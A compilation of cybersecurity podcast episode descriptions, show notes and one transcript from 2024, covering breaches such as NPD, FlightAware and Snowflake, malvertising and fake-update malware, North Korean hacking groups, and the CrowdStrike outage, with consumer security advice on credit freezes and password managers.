A major American chipmaker discloses a cyberattack. Cybercriminals exploit Progressive Web Applications (PWAs) to bypass iOS and Android defenses. Mandiant uncovers a privilege escalation vulnerability in Microsoft Azure Kubernetes Services. ALBeast hits ALB. Microsoft's latest security update has caused significant issues for dual-boot systems. The DOE's new SolarSnitch program aims to sure up solar panel security. Researchers uncover LLM poisoning techniques. An Iranian-linked group uses a fake podcast to lure a target. Our guest is Parya Lotfi, CEO of DuckDuckGoose, discussing the increasing problem of deepfakes in the cybersecurity landscape. Return to sender - AirTag edition.  Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Our guest Parya Lotfi, CEO of DuckDuckGoose, discusses the increasing relevance of deepfakes in the cybersecurity landscape. Selected Reading Microchip Technology discloses cyberattack impacting operations (Bleeping Computer) Android and iOS users targeted with novel banking app phishing campaign (Cybernews) Azure Kubernetes Services Vulnerability Exposed Sensitive Information (SecurityWeek) ALBeast: Misconfiguration Flaw Exposes 15,000 AWS Load Balancers to Risk (HACKREAD) Microsoft's latest security update has ruined dual-boot Windows and Linux PCs (The Verge) DOE debuts SolarSnitch technology to boost cybersecurity in solar energy systems (Industrial Cyber) Researchers Highlight How Poisoned LLMs Can Suggest Vulnerable Code (Dark Reading) Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset | Proofpoint US (Proofpoint) Serial mail thieves thwarted when victim sends herself an AirTag (Apple Insider)  Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

In today's episode, we explore the critical challenges to AI adoption revealed by CISOs, including data privacy concerns, insufficient staff skills, and misaligned organizational priorities, as highlighted in a new survey by Tines. We also discuss how security leaders can address these blockers by leveraging automation, strategic alignment, and continuous training. Additionally, we delve into the rise of malware such as FakeBat, recent data breaches affecting FlightAware and National Public Data, and necessary steps for individuals to secure their personal information. Video Episode: https://youtu.be/HQt1nCHKgxI 00:00 - Intro 01:14 - NPD Hack Exposes Billions of User's Data 04:01 - FlightAware Configuration Error Exposed User Data 07:35 - FakeBat Malware Targets Brave, Zoom, Notion Users 09:45 - Top AI Adoption Challenges and CISO Solutions Articles referenced: https://www.cybersecuritydive.com/spons/the-biggest-blockers-to-ai-adoption-according-to-cisos-and-how-to-remove/723672/ https://thehackernews.com/2024/08/cybercriminals-exploit-popular-software.html https://www.bleepingcomputer.com/news/security/flightaware-configuration-error-leaked-user-data-for-years/ https://www.cbsnews.com/news/social-security-number-leak-npd-breach-what-to-know/ Sign up for digestible cyber news delivered to your inbox: https://news.thedailydecrypt.com Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/ Tags: Tines, Generative AI, Security, CISOs, FakeBat, malvertising, MSIX, Mandiant, FlightAware, Configuration, Cybersecurity, Data Leak, Data breach, Cybercriminals, Social Security, National Public Data Search Phrases: What are today's top cybersecurity news stories?, Tines generative AI security risks, FakeBat malware protection, FlightAware data breach user impact, Cybersecurity measures for CISOs, Understanding malvertising threats, How to safeguard against data leaks, Mandiant findings on malware, Protecting personal information from breaches, Addressing skill shortages in cybersecurity -- Transcript: Aug20 You probably heard about the data breach that alleged the compromised, the personal information of nearly every American citizen exposing social security numbers addresses. And so much more to the dark web cybercriminals. And so today we're going to talk about how this happened, what data was impacted and what you can do to make sure you stay safe. With your social security number on the dark web. Thousands of flight aware, users are now urged to reset their passwords after a configuration error, exposed, sensitive, personal data. For over three years. How did this FlightAware configuration error managed to leak user data for such an extended period of time. Cyber criminals are exploiting popular software searches to spread the fake bat malware using malvertising campaigns and Trojan ISED M S I. X installers to infect unsuspecting users. And finally a recent survey by tines shows that 98% of large tech executives have halted their generative AI projects due to security risks. What strategic measures are CSOs employing to overcome the biggest blockers to AI implementation in their organization. You're listening to the daily decrypt.. Hackers have allegedly infiltrated, a company known as national public data or NPD to steal un-encrypted personal information of billions of people, including social security numbers addresses. And family member names. This breach attributed to the hacker group, U S D O D in April of 2024, puts almost everyone at risk of identity theft. If your data was a part of this breach, which it likely is. People can access it or bid on it on the dark web. So if they could open new financial accounts or take out loans in your name. Luckily, this type of fraud is very preventable. All you have to do is contact the three major credit bureaus and place freezes on your accounts. And even before this breach, this is something that I would recommend to everybody. Unless they're in the process of buying a new home. Or opening up a new credit card. You don't need your credit accounts to be unfrozen. And this is something that I actually didn't do until about a year ago during the, at T and T breach. Where my social security number was also linked to the dark web. And I was very shocked to see how quickly it could be done. They all have web based interfaces where you can go sign up for an account. And click a button to place a freeze on your credit. It's also important to know that once your information is out there, it's out there forever. There's no company that can go and scrub your data from the dark web. If any company is selling you that service? It's not a real service. It's a scam. Or if you purchase the services of a specific company, Uh, under the impression that they can do that. Maybe they're not actually selling that, but maybe that's what you're thinking they're going to do. They're not going to be able to do that. What they are going to be able to do is coach you through the process of placing these credit freezes and help inform you about what that will actually prevent. Alternatively, you can listen to this episode of the daily decrypt and continue to for these tips for free. But placing these freezes on your credit. Essentially just prevents people or entities from running soft or hard credit checks. Against your credit. Which is the barrier for most lines of credit, like new credit cards or home loans. And so by proxy, it prevents new home loans and new credit cards from being opened in your name, which is one of the biggest risks for having your social security number out there. Now if an attacker is really motivated to get you personally, they can use that information to do all kinds of damage, primarily in information gathering about you. To craft more effective phishing campaigns against you. Which is the secondary risk of this type of data breach. So besides placing these credit checks, just be extra vigilant when you're looking at and clicking links through texts or emails. Knowing that this information can help craft more effective phishing emails. Look at everything skeptically. And you should be good to go. Very similarly to that last story. There's an app called FlightAware, which is the world's largest flight tracking platform. That has just revealed a major security data incident. FlightAware discovered a configuration error dating back to January of 2021, which exposed user data for over three years. This data that it exposed can include your user ID, password, email address. And possibly even more sensitive information like your full name, billing and shipping address, social media accounts, phone number, and even social security number. The error was fixed by flight aware on July 25th, 2024. So just a few weeks ago. But the breaches duration leaves significant room for potential misuse of your data. As we talked about in that last story. So if you have a FlightAware account, you'll need to reset your password immediately. If you log into the platform, it will prompt you to do so on your next login. But what they're not going to tell you is that you also need to change. The password to every account that uses the password to your FlightAware account. And that's because the username and combo that was leaked in the FlightAware data breach. We'll now be entered into every one of your accounts automatically. It's not a personal target. They're just going to. Try their luck and see if you may be reuse that username, Cabo password, if that's ringing any bells for you. PEI go change your password. To all of those accounts, and if it sounds too daunting to do that task manually. Or you're not even sure what accounts share passwords. It's time to start using a password manager. I personally use one password as do all of my friends. And I have almost a thousand accounts in there just for myself alone. Managing that amount of passwords is impossible, especially trying to maintain unique passwords. Across all of them. Nobody's memory can handle that. It will also create secure random passwords for you. So you don't have to use your creativity to come up with them or just changing the. The characters that follow the password. Which, by the way, if you use a password, even similar to the one. That was leaked in your FlightAware bridge. That too is considered compromised because attackers will do manipulations common manipulations to all passwords and just use those to try to log into your accounts as well. It's all automated. So, yeah, if you want more information about a password manager, Check out one password. There's also a blog on our website@thedailydecrypt.com that will outline. A simple three-step process to converting over to a password manager. It doesn't have to be as daunting as it may sound. FlightAware is also offering a free 24 month identity protection package through Equifax. So given these two stories back to back. Whoever is listening is likely impacted. Go take advantage of that. That will actually. Monitor for any credit inquiries to Equifax. In addition to you placing those freezes. Like I highly don't. I highly recommend against. Simply monitoring because by the time you get that alert, it's a little too late, right. Place the freeze, and then sign up for that free monitoring. And if you can't tell. Passwords are getting breached every day. I don't like talking about data breaches on this platform. I don't like hearing about them because they happen so frequently. I don't consider it cybersecurity news. The only reason this one made the cut is because they were so long standing. This one has been going on for three years. But if you're hearing this and you still don't use a password manager and you don't change your passwords, the implications are pretty bad. Go do that. Reach out to us on Instagram or YouTube, if you want any help or guidance along that process. It really is a lot simpler of a workflow as well. Like it's a quality of life improvement and a security improvement. I promise you it's worth it. Cyber criminals are using popular Google searches. To help them craft more effective info stealing campaigns. So, what does this mean? They're letting Google tell them what people are searching for specifically around business-related softwares. So for example, if you're going to Google and you're looking for a software that will help you manage personnel. Or manage your tasks or store your documents, et cetera. You're going to go to Google and you say, what are the best softwares? For this type of business task. Well, Google will happily give you the information. If you look for it about what is the most common things to search for around this space, right? So hackers are taking that information. And they're creating fake websites that will offer you services. Inline with what you're searching for. These websites might be carbon copies of actual services. That you could find on the web that would satisfy your search. Or they could be new services. After they've created these imitation websites, they purchase Google ads to get those websites at the top of the search results specifically. For what you're searching for. Then within those websites. You're going to click a link. That's going to download a malware called fake bat. This malware will live in the installer for the software. You're trying to find and download such as brave, like the browser. Key pass, which I'm assuming is a password manager notion, which is like a confluence style thing. Steam for games and zoom for business meetings online. It's important to know that even if you know the software you're searching for like, ah, I'm looking for notion, someone recommended it, you Google the words, notion. That first link. If it's an ad, can still be malicious. So not everyone is searching for what's a business software I can use to hold all my documents. Some of them are just searching for, Hey, where do I go to download notion? That download link. You click from Google. If it's a paid advertisement, could be malicious. And we always say it on this podcast. Just don't click ads. If you don't have to. That's one of the best ways you can avoid this type of thing. And finally 98% of large tech executives have paused AI initiatives due to security risks. This was discovered by an automation from tines during a recent survey and reveals the top barriers to AI adoption. 66% of CSOs, worry about losing control over this sensitive information. This can be anything from customer data, employee data. All the way down to proprietary code, you're feeding into AI to have it help you fix. 60% of the CSOs report lacking AI expertise. 51% find friction between departments from cross-functional teams to align on AI priorities and risks. 49% face issues without dated systems. So choose AI tools to integrate seamlessly with your existing tech stacks. This survey by times can be very valuable, especially if you're someone who's trying to get your CSO to allow you to use AI. AI. Has a lot of potential for automating a lot of work. And freeing up capacity for more impactful work. But. If you have a good CSO. They're going to try to push back on the security risks. Check out the article linked in the show notes below for more information on how and what statistics you can use to help combat your CSOs fears. And start using AI in your workplace. This has been the Daily Decrypt. If you found your key to unlocking the digital domain, show your support with a rating on Spotify or Apple Podcasts. It truly helps us stand at the frontier of cyber news. Don't forget to connect on Instagram or catch our episodes on YouTube. Until next time, keep your data safe and your curiosity alive.

On this week's show, Patrick Gray and Adam Boileau discuss the week's security news, including: The insurance industry's reaction to CrowdStrike's mess Google's Workspace email validation flaw and its consequences for OAuth'd applications Is the VMWare ESX group membership feature a CVE or an FYI? Secureboot continues to under-deliver North Korea's revenue neutral intelligence services And much, much more This episode is sponsored by allowlisting software vendor Airlock Digital. Airlock uses a kernel driver on Windows, so Chief Executive David Cottingham joined to discuss what the CrowdStrike kernel driver bug drama means for security vendors. This episode is also available on Youtube. If you want to ruin the magic of radio and see the faces behind the show, well, now you can! Show notes Business interruption claims will drive insurance losses linked to CrowdStrike IT disruption | Cybersecurity Dive Delta hires David Boies to seek damages from CrowdStrike, Microsoft CrowdStrike disruption direct losses to reach $5.4B for Fortune 500, study finds | Cybersecurity Dive (1145) Why CrowdStrike's Baffling BSOD Disaster Was Avoidable - YouTube CrowdStrike offers a $10 apology gift card to say sorry for outage | TechCrunch Crooks Bypassed Google's Email Verification to Create Workspace Accounts, Access 3rd-Party Services – Krebs on Security Hackers exploit VMware vulnerability that gives them hypervisor admin | Ars Technica Microsoft calls out apparent ESXi vulnerability that some researchers say is a ‘nothing burger' | CyberScoop AMI Platform Key leak undermines Secure Boot on 800+ PC models Chrome will now prompt some users to send passwords for suspicious files | Ars Technica Google Online Security Blog: Improving the security of Chrome cookies on Windows A Senate Bill Would Radically Improve Voting Machine Security | WIRED U.S. told Philippines it made ‘missteps' in secret anti-vax propaganda effort | Reuters Cyber firm KnowBe4 hired a fake IT worker from North Korea | CyberScoop North Korean hacker used hospital ransomware attacks to fund espionage | CyberScoop North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs North Korean hacking group makes waves to gain Mandiant, FBI spotlight | CyberScoop ServiceNow spots sales opportunities post-CrowdStrike outage | Cybersecurity Dive Chaining Three Bugs to Access All Your ServiceNow Data Cyber Supply Chain Risk Management Conference (CySCRM) 2024 | Conference | PNNL

Three Buddy Problem - Episode 6: As the dust settles on the CrowdStrike incident that blue-screened 8.5 million Windows computers worldwide, we dig into CrowdStrike's preliminary incident report, the lack of transparency in the update process and the need for more robust testing and validation. We also discuss Microsoft's responsibility to avoid infinite BSOD loops, risks of deploying EDR agents on critical systems, and how an EU settlement is being blamed for EDR vendors having access to the Windows kernel. Other topics on the show include Mandiant's attribution capabilities, North Korea's gov-backed hacking teams launching ransomware on hospitals, KnowBe4 hiring a fake North Korean IT worker, and new developments in the NSO Group surveillance-ware lawsuit. Hosts: Costin Raiu (Art of Noh), Juan Andres Guerrero-Saade (SentinelLabs), Ryan Naraine (SecurityWeek)

A North Korean hacking group, newly designated as APT45 by the FBI and Mandiant, has broadened its ransomware operations to target healthcare providers, financial institutions, and energy companies. Previously known as Andariel or UNC614, the group has been active since at least 2009 and supports the interests of the North Korean government. Mandiant, a subsidiary of Google Cloud, emphasizes the group's rising sophistication and expanding target range, which now includes advanced technologies and critical infrastructure. The FBI is expected to release an advisory following Mandiant's report, detailing the group's tactics and historical focus on intelligence gathering from defense and research sectors. Additionally, the U.S. Agency for International Development (USAID) reports over 1,300 electronic devices, including iPhones, iPads, and computers, missing over the past three years. With two-thirds of its workforce based overseas, device security remains a critical challenge for the agency, reflecting a broader issue of mobile device management across federal agencies. Despite the losses, USAID remains committed to responsible stewardship of taxpayer dollars and rigorous digital asset security, particularly in challenging global environments. The Daily Scoop Podcast is available every Monday-Friday afternoon. If you want to hear more of the latest from Washington, subscribe to The Daily Scoop Podcast on on Apple Podcasts, Soundcloud, Spotify and YouTube.

Rick Howard, The CSO, Chief Analyst, and Senior Fellow at N2K Cyber, discusses the current state of Cyber Threat Intelligence with CyberWire Hash Table guest John Hultquist, Mandiant's Chief Analyst. References: Andy Greenberg, 2022. Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency [Book]. Goodreads. Josephine Wolff, October 2023. How Hackers Swindled Vegas [Explainer]. Slate. Rick Howard, 2023. Cybersecurity First Principles Book Appendix [Book Support Page]. N2K Cyberwire. Staff, September 2023. mWISE Conference 2023 [Conference Website]. Mandiant. Staff, n.d. VirusTotal Submissions Page [Landing Zone]. VirusTotal. Learn more about your ad choices. Visit megaphone.fm/adchoices

Guests: Robin Shostack, Security Program Manager, Google Jibran Ilyas, Managing Director Incident Response, Mandiant, Google Cloud Topics: You talk about “teamwork under adverse conditions” to describe expedition behavior (EB). Could you tell us what it means? You have been involved in response to many high profile incidents, one of the ones we can talk about publicly is one of the biggest healthcare breaches at this time. Could you share how Expedition Behavior played a role in our response?   Apart from during incident response which is almost definitionally an adverse condition, how else can security teams apply this knowledge? If teams are going to embrace an expeditionary behavior mindset, how do they learn it? It's probably not feasible to ship every SOC team member off to the Okavango Delta for a NOLS course. Short of that, how do we foster EB in a new team? How do we create it in an existing team or an under-performing team?   Resources: EP174 How to Measure and Improve Your Cloud Incident Response Readiness: A New Framework EP103 Security Incident Response and Public Cloud - Exploring with Mandiant EP98 How to Cloud IR or Why Attackers Become Cloud Native Faster? “Take a few of these: Cybersecurity lessons for 21st century healthcare professionals” blog Getting More by Stuart Diamond book Who Moved My Cheese by Spencer Johnson  book

Guest: Wendi Whitmore, Palo Alto Networks [@PaloAltoNtwks]On Twitter | https://x.com/wendiwhitmoreOn LinkedIn | https://www.linkedin.com/in/wendiwhitmore2/______________________Host: MK Palmore, Host of The Leadership Student PodcastOn ITSPmagazine | https://www.itspmagazine.com/itspmagazine-podcast-radio-hosts/mk-palmore______________________This Episode's SponsorsAre you interested in sponsoring an ITSPmagazine Channel?

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.SigmaHQ has introduced Sigma Correlations to enhance its rule-based detection capabilities, allowing for more sophisticated event correlation across multiple Sigma rules.Tyler Buchanan, a 22-year-old from the UK and alleged leader of the Scattered Spider hacking group, was arrested in Spain.Microsoft has issued an urgent update for all supported versions of Windows to address a critical Wi-Fi vulnerability, CVE-2024-30078.Three individuals— Yousef Selassie, Ugochukwu Emmanuel Nwosu, and David Gil—have been charged with operating Empire Market, a dark web marketplace that facilitated over $430 million in illegal transactions.In September 2022, Mandiant began investigating several intrusions conducted by UNC3886, a China-linked cyber espionage group, after discovering malware in ESXi hypervisors.

In today's episode, we delve into the recent surge of identity-based cyberattacks targeting Snowflake customers, with at least 100 companies confirmed impacted as disclosed by Mandiant and Pure Storage (https://www.cybersecuritydive.com/news/snowflake-customer-attacks-what-we-know/719056/). We also explore how attackers are leveraging social engineering to install malware through fake error messages, as outlined by Proofpoint researchers (https://www.helpnetsecurity.com/2024/06/17/social-engineering-malware-installation/). Finally, we discuss how legitimate websites are being exploited to deliver the BadSpace Windows backdoor, detailed by German cybersecurity company G DATA (https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor). 00:00 Introduction to Fake Cyber Attacks 01:11 Fake Error Messages 03:30 The Badspace Backdoor with Trae 06:54 Snowflake Breach: What Happened? Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/ Tags: Snowflake, cyberattacks, identity-based, infiltrate, cybercriminals, malware, proofpoint, fake error messages, hackers, BadSpace, G DATA, cybersecurity, social engineering, cloud data security, Windows backdoor Search Phrases: Identity-based cyberattacks on Snowflake customers Protecting Snowflake accounts from cybercriminals Malware threats to cloud security Proofpoint cybercrime reports Steps to prevent fake error message scams BadSpace Windows backdoor protection measures How hackers use fake browser updates G DATA cybersecurity insights Social engineering defenses in cybersecurity Preventing identity-based infiltrations in cloud systems What we know about the Snowflake customer attacks https://www.cybersecuritydive.com/news/snowflake-customer-attacks-what-we-know/719056/ ---`Sure thing! Here's a flash briefing summarizing the key information about the Snowflake customer attacks: Widespread Impact: Over 100 Snowflake customers have been confirmed impacted by identity-based attacks utilizing stolen credentials from infostealer malware. Approximately 165 businesses remain potentially exposed. [Source: Mandiant] Key Entry Point: Attacks were not due to a vulnerability or breach within Snowflake's system but through stolen credentials from infostealer malware on non-Snowflake systems. Impacted accounts lacked multifactor authentication (MFA). [Source: Mandiant] Early Detection: The earliest unauthorized access to Snowflake customer instances was detected on April 14, with Mandiant beginning its investigation on April 19 and identifying the first confirmed connection to Snowflake on May 14. [Source: Mandiant's June 10 Threat Intelligence Report] Immediate Actions: Snowflake has been suspending user accounts showing signs of malicious activity, blocking suspicious IP addresses, and advising customers to enable MFA and configure network access policies. [Source: Snowflake CISO Brad Jones] Data Theft: The first known sale of stolen data from a Snowflake customer database was posted on May 24. Snowflake disclosed the attacks on May 30, providing indicators of compromise and recommended actions for companies to investigate. [Source: Mandiant] Ongoing Investigation: The investigation, assisted by Mandiant and CrowdStrike, is ongoing. The attacker, referred to as UNC5537, continues to extort victims with stolen data as of June 13. [Source: Mandiant] Malware peddlers love this one social engineering trick! https://www.helpnetsecurity.com/2024/06/17/social-engineering-malware-installation/ ---`- Key Information: Attackers increasingly use fake error messages to trick users into installing malware. Actionable Insight: Stay vigilant when encountering unexpected error messages prompting installations or updates. Key Information: These fake error messages often accompany HTML documents delivered via email attachments. Actionable Insight: Exercise caution when opening email attachments, especially HTML documents, and verify the sender's authenticity. Key Information: Users may be prompted to install root certificates, resolve issues, install extensions, or update DNS caches. Actionable Insight: Before following any such prompts, consult your IT department or perform a quick search to confirm the legitimacy of the request. Key Information: The attack chain requires significant user interaction but cleverly disguises malware installation as a problem-solving step. Actionable Insight: Always take a moment to consider the risk before performing any suggested actions from an error message. Key Information: Various attackers, including initial access brokers, use these techniques to deploy PowerShell scripts, installing malware like DarkGate and NetSupport. Actionable Insight: Familiarize yourself with the signs of PowerShell script execution and report any suspicious activity to your security team. Key Information: Detection is difficult because the malicious script is copied to the clipboard via JavaScript and manually run by the user. Actionable Insight: Be wary of any browser prompts to copy scripts or commands and avoid running them directly from your clipboard. Key Information: Users are the last line of defense if browsing protections and email filters fail. Actionable Insight: Engage in regular cybersecurity training to identify and report suspicious activities promptly. Hackers Exploit Legitimate Websites to Deliver BadSpace Windows Backdoor https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor Compromised Websites as Conduits: Hackers use legitimate websites, often built on platforms like WordPress, to deliver a Windows backdoor named BadSpace. They disguise the attack as fake browser updates, making it hard for users to detect. Multi-Stage Attack Chain: The attack begins with an infected website that checks if a user has visited before. On the first visit, the site collects device data, IP address, user-agent, and location, then sends it to a command-and-control (C2) server. The server responds with a fake Google Chrome update pop-up that either directly drops the malware or uses a JavaScript downloader to deploy BadSpace. Malware Capabilities: BadSpace can harvest system information, take screenshots, execute commands, read/write files, and delete scheduled tasks. It employs anti-sandbox techniques and sets up persistence using scheduled tasks. Connections to SocGholish: The C2 servers linked to BadSpace show connections to another malware known as SocGholish (aka FakeUpdates), which uses similar tactics. Current Threat Landscape: Organizations like eSentire and Sucuri report ongoing campaigns using fake browser updates to spread information stealers and remote access trojans.

Guests: Omar ElAhdan, Principal Consultant, Mandiant, Google Cloud Will Silverstone, Senior Consultant, Mandiant, Google Cloud Topics: Most organizations you see use both cloud and on-premise environments. What are the most common challenges organizations face in securing their hybrid cloud environments? You do IR so in your experience, what are top 5  mistakes organizations make that lead to cloud incidents? How and why do organizations get the attack surface wrong? Are there pillars of attack surface? We talk a lot about how IAM matters in the cloud.  Is that true that AD is what gets you in many cases even for other clouds? What is your best cloud incident preparedness advice for organizations that are new to cloud and still use on-prem as well? Resources: Next 2024 LIVE Video of this episode / LinkedIn version (sorry for the audio quality!) “Lessons Learned from Cloud Compromise” podcast at The Defender's Advantage “Cloud compromises: Lessons learned from Mandiant investigations” in 2023 from Next 2024 EP174 How to Measure and Improve Your Cloud Incident Response Readiness: A New Framework EP103 Security Incident Response and Public Cloud - Exploring with Mandiant EP162 IAM in the Cloud: What it Means to Do It 'Right' with Kat Traxler

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Mandiant has linked a series of data breaches affecting hundreds of Snowflake instances to the use of infostealer malware, primarily targeting non-Snowflake systems to harvest credentials.Authorities have ramped up something they are calling Operation Endgame which is an effort to capture a fellow that goes by the handle "Odd," the alleged mastermind behind the Emotet botnet.McAfee has identified a fake Bahrain government Android app masquerading as the Labour Market Regulatory Authority app, and is designed to steal personal data for financial fraud.A technical deep-dive on Operation Crimson Palace performed by Sophos X-ops: the operation exposes a sophisticated cyberespionage campaign targeting a Southeast Asian government, attributed to Chinese state interests.

In today's episode, we delve into the latest cybersecurity incidents, including Cylance confirming old data sold by Sp1d3r for $750,000, ongoing disruptions in the NHS due to a Russian Qilin ransomware attack, and Google's takedown of coordinated influence campaigns linked to China, Russia, and Indonesia. We also highlight Snowflake account breaches connected to recent data compromises at Advance Auto Parts, Santander, and Ticketmaster. Join us as we explore the implications of these attacks and the latest reports from BleepingComputer, The Guardian, and The Hacker News. References: https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/ https://thehackernews.com/2024/06/google-takes-down-influence-campaigns.html https://www.theguardian.com/society/article/2024/jun/11/cyber-attack-on-london-hospitals-to-take-many-months-to-resolve Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/ Tags: Sp1d3r, Cylance, Snowflake, UNC5537, Google, YouTube, Blogger, Propaganda, Russian hackers, NHS, Disruption, Mitigate Search Phrases: Notorious hacker Sp1d3r data breach Cylance marketing data dark web Snowflake cybersecurity vulnerabilities UNC5537 Snowflake account security Google influence operation crackdown YouTube channel shutdown China propaganda Blogger blog purge misinformation Russia Russian hackers NHS disruption NHS cybersecurity breach recovery Mitigating hacker impact on NHS Cylance confirms data breach linked to 'third-party' platform https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/ ---`Flash Briefing: Data Breach Disclosure: Cylance confirmed that data being sold on a hacking forum is legitimate but old, stolen from a third-party platform. The data allegedly includes 34 million customer and employee emails and personally identifiable information. Source: BleepingComputer. Threat Actor Activity: A hacker known as Sp1d3r is selling the stolen data for $750,000. Researchers indicated this data seems to be old marketing information. BlackBerry Cylance stated no current customers or sensitive data are impacted. Source: Dark Web Informer. Snowflake Links: The same threat actor, Sp1d3r, is also selling 3TB of data from Advance Auto Parts, allegedly breached through a Snowflake account. Other recent breaches at Santander, Ticketmaster, and QuoteWizard also link to Snowflake attacks. Source: BleepingComputer. Credential Theft: Attackers used stolen customer credentials to target Snowflake accounts without multi-factor authentication (MFA). Mandiant linked these attacks to a financially motivated threat actor, UNC5537, who has been active since at least 2020. Source: Mandiant. Recommendations: Ensure all accounts, particularly those related to third-party platforms, have MFA enabled. Regularly update and rotate credentials, and implement network allow lists to restrict access to trusted locations. Source: CrowdStrike, Mandiant. Ongoing Notifications: Snowflake and Mandiant have notified around 165 organizations about potential exposure to these attacks, emphasizing the importance of cybersecurity hygiene and proactive measures. Source: Snowflake. Google Takes Down Influence Campaigns Tied to China, Indonesia, and Russia https://thehackernews.com/2024/06/google-takes-down-influence-campaigns.html ---`- Google Takes Down Inauthentic Channels: Google dismantled a coordinated influence operation connected to the People's Republic of China, removing 1,320 YouTube channels and 1,177 Blogger blogs spreading content about China and U.S. foreign affairs. (Source: Google Threat Analysis Group) Influence Operations Linked to Indonesia: Google also terminated accounts linked to two influence operations from Indonesia that supported the ruling party, further showcasing the global nature of these coordinated efforts. (Source: Google Threat Analysis Group) Russian Influence Network Dismantled: Google removed 378 YouTube channels operated by a Russian consulting firm that spread pro-Russia and anti-Ukraine content, highlighting the ongoing digital battlegrounds. (Source: Google Threat Analysis Group) Monetary Motives Behind Fake Content: Financial incentives drove a network linked to individuals from the Philippines and India, spreading English and Norwegian content about food, sports, and lifestyle topics. (Source: Google Threat Analysis Group) Global Influence Campaigns: Networks from Pakistan, France, Russia, and Myanmar also faced shutdowns for spreading politically charged and nationalistic content, illustrating the diverse sources of disinformation. (Source: Google Threat Analysis Group) Meta and OpenAI Disrupt Tel Aviv-Based Operation: Meta and OpenAI disrupted a Tel Aviv-based influence operation dubbed Storm-1099, which targeted U.S. and Canadian audiences with content regarding the Israel-Hamas conflict. (Source: Meta via CyberScoop) Israel's Ministry of Diaspora Affairs Linked: The New York Times reported Israel's Ministry of Diaspora Affairs funded the covert influence campaign with around $2 million, marking another instance of state-sponsored disinformation. (Source: The New York Times) Microsoft Warns of Russian Disinformation: Microsoft warned of increasing Russian disinformation campaigns targeting the 2024 Summer Olympics in Paris, using AI-generated content to undermine the event and spread fear. (Source: Microsoft Threat Analysis Center) Olympics as a Cyber Threat Target: Google-owned Mandiant and Recorded Future identified the Paris Olympics as a high-risk target for cyber threats, including ransomware, espionage, and hacktivist attacks, emphasizing the need for robust cybersecurity measures. (Source: Mandiant and Recorded Future) Cyber-attack on London hospitals to take ‘many months' to resolve https://www.theguardian.com/society/article/2024/jun/11/cyber-attack-on-london-hospitals-to-take-many-months-to-resolve --- Cyber-attack Impact Duration: A senior NHS source warned that the cyber-attack disrupting hospitals and GP surgeries in London may take "many months" to resolve. Key recovery factors: understanding hacker access, affected records, and data retrievability. Scope and Perpetrators: Six NHS trusts and numerous GP practices in south-east London, serving 2 million patients, are affected. Russian Qilin gang believed responsible, using ransomware to lock systems and demand money for decryption keys. Service Disruptions: Critical incident declared due to inability to perform non-urgent operations, including cancer procedures and planned C-sections. Blood test analysis severely restricted, forcing rationing and cancellation of many medical procedures. Recovery Challenges: IT systems encrypted by attackers force victims to rebuild infrastructure, even if decrypted. Former NCSC head, Ciaran Martin, noted that recovery from such attacks often takes weeks or months. Mitigation Efforts: NHS London region employs "mutual aid" by redistributing tasks to unaffected trusts to mitigate care delivery impact. Example: Patients with heart issues transferred from affected hospitals to St George's hospital. Leadership Insights: NHS England's chief executive, Amanda Pritchard, emphasized the vulnerability to international events and the critical, often unseen, role of pathology services. Ongoing Threats: Qilin gang typically also steals data, posting it on the dark web for extortion if ransom isn't paid. No data has been posted yet.

Cyber assistance coming to rural hospitals UK and Canada launch investigation into 23andMe breach Mandiant and Snowflake sending out breach notices Thanks to today's episode sponsor, Vanta When it comes to ensuring your company has top-notch security practices, things can get complicated, fast. Vanta automates compliance for SOC 2, ISO 27001, and more, saving you time and money. With Vanta, you can unify your security program management and proactively manage security reviews with AI-powered security questionnaires.Our listeners get $1,000 off at vanta.com/headlines.  

It's the most boring part of incident response. Skip it at your peril, however. In this interview, we'll talk to Joe Gross about why preparing for incident response is so important. There's SO MUCH to do, we'll spend some time breaking down the different tasks you need to complete long before an incident occurs. Resources 5 Best Practices for Building a Cyber Incident Response Plan This segment is sponsored by Graylog. Visit https://securityweekly.com/graylog to learn more about them!   It's the week before RSA and the news is PACKED. Everyone is trying to get their RSA announcements out all at once. We've got announcements about funding, acquisitions, partnerships, new companies, new products, new features... To make things MORE challenging, everyone is also putting out their big annual reports, like Verizon's DBIR and Mandiant's M-Trends! Finally, we've got some great essays that are worth putting on your reading list, including a particularly fun take on the Verizon DBIR by Kelly Shortridge. Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-360

